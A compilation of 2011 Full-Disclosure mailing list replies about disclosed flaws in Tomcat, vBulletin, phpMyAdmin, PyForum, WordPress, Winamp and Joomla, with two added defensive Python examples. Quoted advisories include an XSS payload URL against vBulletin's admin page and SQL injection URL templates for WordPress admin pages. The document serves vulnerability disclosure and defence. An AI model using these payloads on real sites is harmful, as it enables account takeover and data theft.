> > http://tomcat.apache.org/security-7.html
> > http://tomcat.apache.org/security-6.html
> > http://tomcat.apache.org/security-5.html
> > https://issues.apache.org/bugzilla/show_bug.cgi?id=51698
> 
> Do you have any information on when the supported security release is going to 
> be announced? Patching production using a diff from SVN is not usually very 
> nice :)
> 
> Best regards,
> Henri Salo

Version 7.0.21 is available:

http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/download-70.cgi

Best regards,
Henri Salo
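A defender-side check for the advisory quoted above, as an added example (not part of the advisory or of the Tomcat project): it parses a server.xml and reports which AJP connectors use an affected implementation without the requiredSecret mitigation. The resolution of the "AJP/1.3" shorthand to a connector class and the sample configuration are my assumptions, not something the advisory spells out.

```python
"""Audit a Tomcat server.xml for AJP connectors matching CVE-2011-3190.

Added example; not part of the advisory or of Tomcat. It encodes what the
advisory states: which AJP connector classes are affected, that
org.apache.jk.server.JkCoyoteHandler is not, and that setting requiredSecret
on the AJP connector is one mitigation. It does not replace upgrading (the
thread notes 7.0.21 is available). Resolving the "AJP/1.3" shorthand follows
the advisory's "default" markers (Jk on 5.5/6.0, AjpProtocol on 7.0) and,
when the APR native library is loaded, AjpAprProtocol; that last mapping is
an assumption to confirm against the catalina log of the real server.
"""
import xml.etree.ElementTree as ET

AFFECTED = {
    "org.apache.coyote.ajp.AjpProtocol",
    "org.apache.coyote.ajp.AjpNioProtocol",
    "org.apache.coyote.ajp.AjpAprProtocol",
}
NOT_AFFECTED = {"org.apache.jk.server.JkCoyoteHandler"}


def resolve_ajp_class(protocol, tomcat_major, apr_loaded):
    """Return the implementing class for an AJP Connector, or None for HTTP."""
    if protocol is None or protocol.upper().startswith("HTTP"):
        return None                      # missing attribute means HTTP/1.1
    if protocol.startswith("org."):
        return protocol                  # fully qualified class name
    if protocol.upper() == "AJP/1.3":
        if apr_loaded:
            return "org.apache.coyote.ajp.AjpAprProtocol"
        if tomcat_major >= 7:
            return "org.apache.coyote.ajp.AjpProtocol"
        return "org.apache.jk.server.JkCoyoteHandler"
    return protocol                      # unknown value: reported as-is


def audit_server_xml(xml_text, tomcat_major, apr_loaded=False):
    """Classify every AJP <Connector>: not-affected, mitigated, exposed or unknown."""
    root = ET.fromstring(xml_text)
    findings = []
    for conn in root.iter("Connector"):
        impl = resolve_ajp_class(conn.get("protocol"), tomcat_major, apr_loaded)
        if impl is None:
            continue                     # HTTP connector, out of scope
        if impl in NOT_AFFECTED:
            status = "not-affected"
        elif impl in AFFECTED:
            # requiredSecret only helps when the reverse proxy sends the same
            # secret (mod_jk worker "secret"); the proxy side is not checked here.
            status = "mitigated" if conn.get("requiredSecret") else "exposed"
        else:
            status = "unknown"
        findings.append({"port": conn.get("port"), "impl": impl, "status": status})
    return findings


# Constructed sample, not a real deployment's configuration.
SAMPLE_SERVER_XML = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="on"/>
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Connector port="8010" protocol="org.apache.coyote.ajp.AjpNioProtocol"
               requiredSecret="REPLACE-WITH-LONG-RANDOM-SECRET"/>
    <Connector port="8011" protocol="org.apache.jk.server.JkCoyoteHandler"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>
"""

if __name__ == "__main__":
    for f in audit_server_xml(SAMPLE_SERVER_XML, tomcat_major=7):
        print(f"port {f['port']}: {f['impl']} -> {f['status']}")
```

Run it against the real server.xml with the major version actually deployed; an "exposed" finding means either set requiredSecret on both sides or upgrade.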



Re: [Full-disclosure] [SECURITY] [DSA 2200-1] nss security update

2011-09-04 Thread Henri Salo
On Fri, Sep 02, 2011 at 11:03:17AM +0200, Dimitry Andric wrote:
> On 2011-08-31 20:37, Packet Storm wrote:
> > Is this supposed to be DSA-2201-1 and not DSA-2200-1?
> >
> > DSA-2200-1 already exists as an Iceweasel advisory..
> 
> You would really expect DSA-2299 to be followed by DSA-2300, but
> apparently there was an overflow. ;)

You should see:

http://testing-security.debian.net/
http://anonscm.debian.org/viewvc/secure-testing/data/DSA/list?revision=17150&view=markup

The DSA "process" is quite open to everyone interested.

Best regards,
Henri Salo



Re: [Full-disclosure] [SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

2011-08-31 Thread Henri Salo
On Mon, Aug 29, 2011 at 08:52:00PM +0100, Mark Thomas wrote:

Do you have any information on when the supported security release is going to be 
announced? Patching production using a diff from SVN is not usually very nice :)

Best regards,
Henri Salo



Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available

2011-08-10 Thread Henri Salo
On Wed, Aug 10, 2011 at 12:23:49PM -0400, T Biehn wrote:
> Maybe he should build a vulnerability into each version, so he can announce
> each new version with the disclosure and satisfy your constraints.

After this he will get friends to his home. Not so happy friends..



Re: [Full-disclosure] VBulletin adminCP Cross Site Scripting

2011-08-04 Thread Henri Salo
On Wed, Aug 03, 2011 at 06:37:32PM +0600, HAroon . wrote:
> *Advisory Information*
> 
> Title: vBulletin Cross Site Scripting Vulnerability
> 
> Date published: 02-08-2011
> 
> Vendors contacted: vBulletin team
> 
>  
> 
> *Vulnerability Information*
> 
> Class: XSS flaw
> 
> Vulnerable page: Admin Login Page (admincp)
> 
> Remotely Exploitable: Yes
> 
> Locally Exploitable: No
> 
>  
> 
> *Vulnerability Description*
> 
> vBulletin is a community forum solution for a wide range of users,
> including industry leading companies. A XSS vulnerability has been discovered
> that could allow an attacker to carry out an action impersonating a legal 
> user,
> or to obtain access to a user's account.
> 
> This flaw allows unauthorized disclosure and modification of information,
> and it allows disruption of service.
> 
>  
> 
> *Vulnerable versions*
> 
> 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1
> 
>  
> 
> *Non-vulnerable Packages*
> 
> . vBulletin prior to 4.1.3
> 
> *Vendor Information, Solutions and Workarounds*
> 
> The vBulletin team has released patches for this flaw; the patch was released on
> 02-08-2011. 
> https://www.vbulletin.com/forum/showthread.php/385133-vBulletin-4.1.3-4.1.4-and-4.1.5-Security-Patch
> 
>  
> 
> *Credits*
> 
> This vulnerability was discovered by Muhammad Haroon from Innovative
> Solutions KSA. OWASP Chapter Lead of Pakistan. haroon [at] live [dot] it
> 
>  
> 
> *Proof of Concept Code*
> 
> This is a Cross Site Scripting (XSS) vulnerability within vBulletin
> community forum solution. In order to exploit this flaw the following vector would
> be used.
> 
>  
> http://www.example.com/forums/admincp/?";>alert('Xss_found_By_M.Haroon')
> 
>  
> 
> *Report Timeline*
> 
> 30-07-2011: Notifies the vBulletin team about the vulnerability.
> 31-07-2011: vBulletin Team asks for a technical description of the flaw
> 31-07-2011: Technical Details sent to vbulletin team
> 02-08-2011: vBulletin notifies that a fix has been produced and is
> available to the users on 2nd August 2011
> 03-08-2011: Vulnerability publicly disclosed.

Did you request a CVE-ID for this issue?

Best regards,
Henri Salo



Re: [Full-disclosure] phpMyAdmin 3.x Conditional Session Manipulation

2011-08-03 Thread Henri Salo
On Sun, Jul 24, 2011 at 06:10:00PM +0200, Mango wrote:
> ###
> 
> phpMyAdmin 3.x Conditional Session Manipulation
>   
> ###[ Advisory from ]###
> 
> 
> [ www.Xxor.se ]
> 
> Application: phpMyAdmin 3.x
> Patched ver: 3.3.10.3 and 3.4.3.2
> Severity:Low
> Exploitable: Remote
> PMASA ID:PMASA-2011-12
> 
> 
> [ Description ]
> 
> If the Swekey extension is activated a remote attacker can manipulate the
> variables in the global namespace.
> 
> 
> [ Fix ]####
> 
> Upgrade to version 3.3.10.3 or 3.4.3.2.
> Or apply patches available at: http://www.phpmyadmin.net/home_page/security/
> 
> 
> #[ Timeline ]##
> 
> 2011-07-07 - Reported to vendor
> 2011-07-23 - Patch available
> 2011-07-24 - Disclosed

This issue can be referred to as CVE-2011-2719.

Best regards,
Henri Salo



Re: [Full-disclosure] [BMSA-2009-07] Backdoor in PyForum

2011-07-28 Thread Henri Salo
On Mon, Nov 30, 2009 at 09:06:44PM +0700, Nam Nguyen wrote:
> BLUE MOON SECURITY ADVISORY 2009-07
> ===
> 
> 
> :Title: Backdoor in PyForum
> :Severity: Critical
> :Reporter: Blue Moon Consulting
> :Products: PyForum v1.0.3
> :Fixed in: --
> 
> 
> Description
> ---
> 
> pyForum is a 100% python-based message board system based on the excellent 
> web2py framework.
> 
> We have discovered a backdoor in PyForum. Anyone could force a password reset 
> on behalf of other users whose emails are known. More importantly, the 
> software author, specifically, can obtain the new Administrator's password 
> remotely.
> 
> The problem is in module ``forumhelper.py``. A new password is generated and 
> saved in the database. Then a notification email which contains this new 
> password in plaintext is sent to the user. There is no password reset 
> confirmation code or similar verification action required. This causes a mild 
> annoyance, or at most an account lockout.
> 
> When it comes to the Administrator account, however, the problem is more severe. 
> This default account's email is set to ``administra...@pyforum.org`` and can 
> only be changed directly in the database. Therefore, the new password is sent to 
> the software author by default. And since this email address is known, 
> everyone can request a password reset easily.
> 
> This bug may exist in older versions and in zForum, from which pyForum 
> derives, too.
> 
> Workaround
> --
> 
> Change Administrator's email address immediately and do not publish it 
> anywhere.
> 
> Fix
> ---
> 
> There is no fix at the moment.
> 
> Disclosure
> --
> 
> Blue Moon Consulting adapts `RFPolicy v2.0 
> <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.
> 
> Considering this *an intentional backdoor*, we decided to alert the public 
> immediately.
> 
> :Initial vendor contact:
> 
>   --
> 
> :Vendor response:
> 
>   --
> 
> :Further communication:
> 
>   --
> 
> :Public disclosure: November 30, 2009
> 
> :Exploit code:
> 
>   No exploit code required.
> 
> Disclaimer
> --
> 
> The information provided in this advisory is provided "as is" without 
> warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, 
> either express or implied, including the warranties of merchantability and 
> fitness for a particular purpose. Your use of the information on the advisory 
> or materials linked from the advisory is at your own risk. Blue Moon 
> Consulting Co., Ltd reserves the right to change or update this notice at any 
> time.

CVE-2009-5025 has been assigned for this issue.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Drupal Data Module Multiple Vulnerabilities

2011-07-24 Thread Henri Salo
On Wed, Feb 09, 2011 at 12:40:29PM -0500, Justin Klein Keane wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Description of Vulnerability:
> 
> Drupal (http://drupal.org) is a robust content management system (CMS)
> written in PHP and MySQL. The Drupal Data module
> (http://drupal.org/project/data) "helps you model, manage and query
> related sets of tables. It offers an administration interface and a low
> level API for manipulating tables and accessing their contents."
> 
> The Data module contains multiple Cross Site Scripting (XSS)
> vulnerabilities because it fails to sanitize table descriptions, field
> names or labels before display.  This results in multiple stored XSS as
> well as DOM based XSS vulnerabilities.  Drupal site users with the
> ability to create or edit tables using the Data module could inject
> arbitrary HTML into administrative pages.
> 
> The Data module also contains numerous SQL injection vulnerabilities
> because it fails to sanitize values for table names or column names
> before invoking SQL statements.  This allows users with the ability to
> create or edit tables managed by the Data module to perform SQL
> injection attacks.
> 
> Systems affected:
> 
> Drupal 6.20 with Data 6.x-1.0-alpha14 was tested and shown to be vulnerable.
> 
> Impact
> 
> User could inject arbitrary scripts into pages affecting site users.
> This could result in administrative account compromise leading to web
> server process compromise. A more likely scenario would be for an
> attacker to inject hidden content (such as iframes, applets, or embedded
> objects) that would attack client browsers in an attempt to compromise
> site users' machines. This vulnerability could also be used to launch
> cross site request forgery (XSRF) attacks against the site that could
> have other unexpected consequences.
> 
> Mitigating factors:
> 
> In order to exploit this vulnerability the attacker must have
> credentials to an authorized account that has been assigned the
> permissions to administer or edit in the Data module. This could be
> accomplished via social engineering, brute force password guessing, or
> abuse of legitimate credentials.
> 
> Vendor response:
> 
> Drupal security team does not handle issues with pre-release versions of
> modules (such as alpha or dev). These issues were reported in the
> module's public issue queue (http://drupal.org/node/1056470).
> 
> The text of this advisory has also been posted at
> http://www.madirish.net/?article=480
> 
> - -- 
> Justin C. Klein Keane
> http://www.MadIrish.net

Does this issue have a CVE identifier? I can request one if there 
isn't one.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [Bkis] sNews 1.7.1 XSS vulnerability

2011-07-24 Thread Henri Salo
On Thu, May 12, 2011 at 09:59:16AM +0700, Bkis wrote:
> 1. General Information
> 
> sNews is a free content management system (CMS) written in PHP and MySQL. It 
> is available at http://snewscms.com/. In April 2011, Bkis Security discovered 
> an XSS (Cross-site Scripting) vulnerability in sNews CMS version 1.7.1. 
> Taking advantage of this vulnerability, a hacker might execute malicious code 
> or obtain the cookie of the CMS's administrator.
> 
> Details: http://security.bkis.com/snews-1-7-1-xss-vulnerability/
> SVRT Advisory:Bkis 01-2011
> Initial vendor notification:  01/05/2011
> Release Date: 12/05/2011
> Update Date:  12/05/2011
> Discovered by:Cao Xuan Sang - Bkis
> Attack Type:  XSS
> Security Rating:  High
> Impact:   Code Execution
> Affected Software:sNews 1.7.1 ( possibly in some earlier versions )
> 
> 2. Technical Descriptions
> 
> An XSS vulnerability exists in the "reorder" functions of the administrator: Categories 
> reorder, Articles reorder and Pages reorder. Here, input variables are not 
> adequately checked and filtered before querying the database. Then, if a 
> special character is added to the value, the SQL query will have wrong 
> syntax, and the error notification is displayed in the browser 
> accompanied by the value of the erroneous variable and the erroneous query, 
> causing an XSS vulnerability.
> It is the administrators that are affected by this vulnerability. In 
> different scenarios, a hacker is able to steal the Administrator's cookie or 
> redirect the browser to a malicious website, etc. 
> 
> 3. Solution
> sNews's development team has not issued patches for this vulnerability 
> yet. Thus, Bkis recommends that individuals and organizations using this software 
> fix the flaw with the solution below:
> Search in file snews.php:
>   $type_id = str_replace($remove,'',$key);
> Then, add the code below:
>   $value = clean(cleanXSS(trim($value)));
> 
> 4. About Bkis
> Bkis is a leading Vietnamese company in researching and deploying network security 
> software and solutions.
> website: http://bkis.vn

Identifier CVE-2011-2706 has been assigned to this issue. Please edit the advisory 
accordingly.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Phone Scam

2011-07-20 Thread Henri Salo
On Wed, Jul 20, 2011 at 02:19:37PM +0100, Dave wrote:
> A stranger on the end of a phone call tells you your PC is infected, and you 
> should download and install a RC server so it can be fixed.

I haven't seen anything like this in Finland. I'll bet they will start soon..

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Fwd: Joomla! Security News

2011-07-20 Thread Henri Salo
Joomla! Developer Network - Security News

///
[20110701] - XSS Vulnerability

Posted: 19 Jul 2011 09:15 PM PDT
http://feedproxy.google.com/~r/JoomlaSecurityNews/~3/4KDvSjZRIvs/357-20110701-xss-vulnerability.html?utm_source=feedburner&utm_medium=email


Project: Joomla!
SubProject: All
Severity: Medium
Versions: 1.6.5 and all earlier 1.6.x versions
Exploit type: XSS
Reported Date: 2011-July-11
Fixed Date: 2011-July-19

Description

Inadequate escaping leads to XSS vulnerability.

Affected Installs

Joomla! version 1.6.5 and all earlier 1.6.x versions
Solution

Upgrade to the latest Joomla! version (1.7.0 or later)

Reported by Aung Khant
Contact

The JSST at the Joomla! Security Center.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [BMSA-2009-07] Backdoor in PyForum

2011-07-20 Thread Henri Salo
On Mon, Nov 30, 2009 at 09:06:44PM +0700, Nam Nguyen wrote:
> BLUE MOON SECURITY ADVISORY 2009-07
> ===
> 
> 
> :Title: Backdoor in PyForum
> :Severity: Critical
> :Reporter: Blue Moon Consulting
> :Products: PyForum v1.0.3
> :Fixed in: --
> 
> 
> Description
> ---
> 
> pyForum is a 100% python-based message board system based in the excellent 
> web2py framework.
> 
> We have discovered a backdoor in PyForum. Anyone could force a password reset 
> on behalf of other users whose emails are known. More importantly, the 
> software author, specifically, can obtain the new Administrator's password 
> remotely.
> 
> The problem is in module ``forumhelper.py``. A new password is generated and 
> saved in the database. Then a notification email which contains this new 
> password in plaintext is sent to the user. There is no password reset 
> confirmation code or similar verification action required. This causes a mild 
> annoyance, or at most an account lockout.
> 
> When it comes to the Administrator account, however, the problem is more severe. 
> This default account's email is set to ``administra...@pyforum.org`` and can 
> only be changed directly in the database. Therefore, the new password is sent to 
> the software author by default. And since this email address is known, 
> everyone can request a password reset easily.
> 
> This bug may exist in older versions and in zForum, from which pyForum 
> derives, too.
> 
> Workaround
> --
> 
> Change Administrator's email address immediately and do not publish it 
> anywhere.
> 
> Fix
> ---
> 
> There is no fix at the moment.
> 
> Disclosure
> --
> 
> Blue Moon Consulting adapts `RFPolicy v2.0 
> <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.
> 
> Considering this *an intentional backdoor*, we decided to alert the public 
> immediately.
> 
> :Initial vendor contact:
> 
>   --
> 
> :Vendor response:
> 
>   --
> 
> :Further communication:
> 
>   --
> 
> :Public disclosure: November 30, 2009
> 
> :Exploit code:
> 
>   No exploit code required.
> 
> Disclaimer
> --
> 
> The information provided in this advisory is provided "as is" without 
> warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, 
> either express or implied, including the warranties of merchantability and 
> fitness for a particular purpose. Your use of the information on the advisory 
> or materials linked from the advisory is at your own risk. Blue Moon 
> Consulting Co., Ltd reserves the right to change or update this notice at any 
> time.

This still hasn't been fixed. I asked about the status in 
http://www.pyforum.org/pyforum/default/view_topic/631

If I am correct, the vulnerabilities in 
http://seclists.org/bugtraq/2009/Dec/224 are also not fixed.

Is there a CVE-identifier for BMSA-2009-07?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
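The reset flow the quoted advisory describes (in both messages that quote it), beside a flow that requires a mailed confirmation token before anything changes, as an added Python example that is not PyForum or web2py code; the addresses, the in-memory user table and the mail outbox are constructed for the demo:

```python
"""Password reset on request versus reset confirmed by a mailed token.

Added example, not PyForum or web2py code. The user table, the outbox and
the addresses below are constructed in memory so the script runs offline."""
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 3600  # seconds a confirmation link stays valid (assumed policy)

# Constructed stand-ins for the forum's database and outgoing mail.
USERS = {
    "admin@forum.example": {"password_hash": None},
    "alice@forum.example": {"password_hash": None},
}
OUTBOX = []        # (recipient, body) pairs instead of real e-mail
RESET_TOKENS = {}  # sha256(token) -> {"email": ..., "expires": ...}


def hash_password(password):
    # Illustrative only; a real deployment uses a slow KDF (bcrypt/scrypt/argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def _digest(token):
    # Store only a hash of the token so a database read does not yield usable links.
    return hashlib.sha256(token.encode()).hexdigest()


def flawed_reset(email):
    """The flow described in the advisory: a request alone replaces the stored
    password and mails the new one in plaintext. Anyone who knows the address
    can trigger it, and whoever reads that mailbox receives the credential;
    no proof of mailbox ownership is ever required."""
    user = USERS.get(email)
    if user is None:
        return False
    new_password = secrets.token_urlsafe(9)
    user["password_hash"] = hash_password(new_password)
    OUTBOX.append((email, "Your new password is: " + new_password))
    return True


def request_reset(email, now=None):
    """Step 1 of the confirmed flow: the account is left untouched. A random
    single-use token is created, only its hash is stored, and the raw token is
    mailed as a link. The token is also returned here purely so the demo and
    test can play the mailbox owner; production code returns nothing."""
    now = time.time() if now is None else now
    if email not in USERS:
        return None  # a real UI shows the same response either way (no enumeration)
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[_digest(token)] = {"email": email, "expires": now + TOKEN_TTL}
    OUTBOX.append((email, "Confirm your reset: https://forum.example/reset?token=" + token))
    return token


def confirm_reset(token, new_password, now=None):
    """Step 2: the password changes only for a token that was actually mailed,
    before it expires, and each token works exactly once (pop removes it)."""
    now = time.time() if now is None else now
    record = RESET_TOKENS.pop(_digest(token), None)
    if record is None or now > record["expires"]:
        return False
    USERS[record["email"]]["password_hash"] = hash_password(new_password)
    return True


def check_login(email, password):
    user = USERS.get(email)
    if user is None or user["password_hash"] is None:
        return False
    return hmac.compare_digest(user["password_hash"], hash_password(password))


if __name__ == "__main__":
    flawed_reset("admin@forum.example")
    print("flawed flow mailed:", OUTBOX[-1][1])
    tok = request_reset("alice@forum.example")
    print("confirmed flow mailed:", OUTBOX[-1][1])
    print("wrong token accepted?", confirm_reset("not-the-token", "pw"))
    print("real token accepted?", confirm_reset(tok, "correct horse"))
    print("token reusable?", confirm_reset(tok, "again"))
```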


Re: [Full-disclosure] Possible Code Execution vulnerability in WordPress ?

2011-07-19 Thread Henri Salo
On Sun, Jul 03, 2011 at 01:46:30PM +0200, Marc Manthey wrote:
> hello list,
> 
> Sorry, this is my first post to this list, but I am really worried  
> about a WordPress vulnerability, and someone on this list might use  
> WordPress as well
> and could give me some advice on what to do.
> 
> I have been using WordPress for 2 years without any trouble and update  
> regularly, but last Friday I got a mail from my hoster that someone  
> "uploaded"
> a phishing script into my "upload folder" in WordPress, and Google put  
> my site on the blocklists as well.
> 
>   After I found out that the "contact form" module might cause the  
> problem, because I always found a
>   "wpcf7_captcha" directory in my "upload folder", I removed the  
> module and all went fine for a day..
> 
> >> http://let.de/wp-content/themes/twentyten/www1.royalbank.com/index.html
> 
> Today I received another mail from rsa.com that the same script is  
> still on my site, just in a "theme" folder.
> 
> > http://let.de/wp-content/uploads/2011/www1.royalbank.com/index.html
> 
> 
> I looked into the installed "phishing script"   
> http://www.2shared.com/file/M9zwMVr5/www1royalbankcom.html
> It seems everything is loaded from https://www1.royalbank.com/, for  
> example
> https://www1.royalbank.com/common/images/english/logo_rbc_rb.gif  <  
> but this is not the original banking site !!
> 
> Is this a DNS manipulation? https://www1.royalbank.com <  ??? When I  
> try http://www.royalbank.com it redirects me to the original banking  
> site at
> 
> http://www.rbcroyalbank.com  
> 
> After I searched for some information, I found this on the full  
> disclosure list, and I am a bit concerned now
> 
> [Full-disclosure] Code Execution vulnerability in WordPress  
> http://seclists.org/fulldisclosure/2011/Apr/535
> 
> 
> Vulnerabilities in WordPress http://www.securityfocus.com/archive/1/510274
> 
> Any idea what to do besides shutting my site down :)?
> 
> regards
> 
> Marc
> 
> >>  Original Message 
> >> Subject:   Fraudulent site, please shut down! [RBC 11266] IP:
> >> 91.184.33.25 Domain: let.de
> >> Date:  Sun, 3 Jul 2011 02:33:05 +0300
> >> From:  
> >> To:
> >> CC:
> >>
> 
> 
> 
> --  Les enfants teribbles - research / deployment
> Marc Manthey- Vogelsangerstrasse 97
> 50823 Köln - Germany
> Tel.:0049-221-29891489
> Mobil:0049-1577-3329231
> blog: http://let.de
> twitter: http://twitter.com/macbroadcast/
> facebook : http://opencu.tk

Which version of WordPress and which modules were you using? Do you have logs of the 
incident? I am including RBC in this email as they are probably interested in 
the details. There might be other similar phishing pages active.

www1.royalbank.com has address 142.245.40.233
www.royalbank.com has address 142.245.34.203
royalbank.com has address 142.245.1.203
www.rbcroyalbank.com has address 142.245.1.15
rbcroyalbank.com has address 142.245.1.15

Whois of both domains:
---
   Registrant: 
  Royal Bank of Canada
  RBC Domain Registration
  330 Front St W - 4th Flr 
  Toronto, ON M5V 3B7
  CA
  Email: rbcdomain...@rbc.com

   Registrar Name: CORPORATE DOMAINS, INC.
   Registrar Whois...: whois.corporatedomains.com
   Registrar Homepage: www.cscprotectsbrands.com 

   Domain Name: rbcroyalbank.com

  Created on..: Thu, Nov 09, 2000
  Expires on..: Sun, Nov 09, 2014
  Record last updated on..: Fri, Feb 11, 2011

   Administrative,Technical Contact:
  Royal Bank of Canada
  RBC Domain Registration
  330 Front St W - 4th Flr 
  Toronto, ON M5V 3B7
      CA
  Phone: +1.4163485121
  Email: rbcdomain...@rbc.com

   DNS Servers:

   ns4.rbc.com
   ns2.rbc.com
   ns1.rbc.com
   ns3.rbc.com
---

Reading this bug report http://core.trac.wordpress.org/ticket/17969 tells me 
that there is still a possibility of a vulnerability. I'll bet it is in one of the 
modules as well.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress

2011-07-06 Thread Henri Salo
On Fri, Jul 01, 2011 at 11:23:40AM +0200, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
> ===
>   title: Multiple SQL Injection Vulnerabilities
> product: WordPress
>  vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
>   fixed version: 3.1.4/3.2-RC3
>  impact: Medium
>homepage: http://wordpress.org/
>   found: 2011-06-21
>  by: K. Gudinavicius   
>  SEC Consult Vulnerability Lab 
>  https://www.sec-consult.com
> ===
> 
> Vendor description:
> ---
> "WordPress was born out of a desire for an elegant, well-architectured
> personal publishing system built on PHP and MySQL and licensed under
> the GPLv2 (or later). It is the official successor of b2/cafelog.
> WordPress is fresh software, but its roots and development go back to
> 2001."
> 
> Source: http://wordpress.org/about/
> 
> 
> 
> Vulnerability overview/description:
> ---
> Due to insufficient input validation in certain functions of WordPress
> it is possible for a user with the "Editor" role to inject arbitrary
> SQL commands. By exploiting this vulnerability, an attacker gains
> access to all records stored in the database with the privileges of the
> WordPress database user.
> 
> 
> 
> Proof of concept:
> -
> 1) The get_terms() filter declared in the wp-includes/taxonomy.php file
> does not properly validate user input,  allowing an attacker with
> "Editor" privileges to inject arbitrary SQL commands in the "orderby"
> and "order" parameters passed as array members to the vulnerable filter
> when sorting for example link categories. 
> 
> The following URLs could be used to perform blind SQL injection
> attacks: 
> 
> http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
> injection]&order=[SQL injection]
> http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
> injection]&order=[SQL injection]
> http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
> injection]&order=[SQL injection]
> 
> 
> 2) The get_bookmarks() function declared in the
> wp-includes/bookmark.php file does not properly validate user input,
> allowing an attacker with "Editor" privileges to inject arbitrary SQL
> commands in the "orderby" and "order" parameters passed as array
> members to the vulnerable function when sorting links. 
> 
> The following URL could be used to perform blind SQL injection attacks:
> 
> http://localhost/wp-admin/link-manager.php?orderby=[SQL
> injection]&order=[SQL injection]
> 
> 
> Vulnerable / tested versions:
> -
> The vulnerability has been verified to exist in version 3.1.3 of
> WordPress, which is the most recent version at the time of discovery.
> 
> 
> Vendor contact timeline:
> 
> 2011-06-22: Contacting vendor through secur...@wordpress.org
> 2011-06-22: Vendor reply, sending advisory draft
> 2011-06-23: Vendor confirms security issue
> 2011-06-30: Vendor releases patched version
> 2011-07-01: SEC Consult publishes advisory
> 
> 
> 
> Solution:
> -
> Upgrade to version 3.1.4 or 3.2-RC3
> 
> 
> Workaround:
> ---
> A more restrictive role, e.g. "Author", could be applied to the user.
> 
> 
> 
> Advisory URL:
> -
> https://www.sec-consult.com/en/advisories.html
> 
> 
> ~~~
> SEC Consult Unternehmensberatung GmbH
> 
> Office Vienna
> Mooslackengasse 17
> A-1190 Vienna
> Austria
> 
> Tel.: +43 / 1 / 890 30 43 - 0
> Fax.: +43 / 1 / 890 30 43 - 25
> Mail: research at sec-consult dot com
> https://www.sec-consult.com
> 
> EOF K. Gudinavicius / @2011

Do the WordPress people know if this issue already has a CVE identifier? At least 
the author of the advisory didn't request one, nor could I find one on the lists / 
web.

References:
http://secunia.com/advisories/45099/
http://wordpress.org/news/2011/06/wordpress-3-1-4/

This is also not listed in OSVDB, which I can handle after we receive a 
CVE identifier.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] in_midi multiple vulnerabilities in Winamp 5.61

2011-07-06 Thread Henri Salo
> 
> 
> ###
> 
> ===
> 3) The Code
> ===
> 
> 
> http://aluigi.org/poc/winamp_3.zip
> 
> winamp_3a.mid will exploit the arbitrary freeing of address 0x61616161.
> 
> 
> ###
> 
> ==
> 4) Fix
> ==
> 
> 
> No fix.
> 
> 
> ###
> 
> 
> --- 
> Luigi Auriemma
> http://aluigi.org

No CVE identifier was requested by the finder, "Luigi Auriemma", but I requested 
one from MITRE. They have not yet responded. I also reported this issue to 
Winamp. No response from them either. Does anyone have experience with Winamp's 
security-related communication?

Do you have any idea if this has been fixed in Winamp Media Player version 5.62?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-07-06 Thread Henri Salo
On Tue, Jun 28, 2011 at 02:25:07PM +0800, YGN Ethical Hacker Group wrote:
> Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
> 
> 
> 
> 1. OVERVIEW
> 
> Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting 
> issues.
> 
> 
> 2. BACKGROUND
> 
> Joomla is a free and open source content management system (CMS) for
> publishing content on the World Wide Web and intranets. It comprises a
> model–view–controller (MVC) Web application framework that can also be
> used independently.
